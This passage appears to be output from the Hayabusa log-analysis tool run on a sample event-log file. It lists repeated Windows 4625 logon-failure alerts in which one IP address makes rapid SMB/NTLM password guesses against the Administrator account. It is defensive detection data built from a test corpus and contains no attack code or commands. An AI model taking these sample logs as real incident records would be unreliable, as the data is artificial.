+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: 
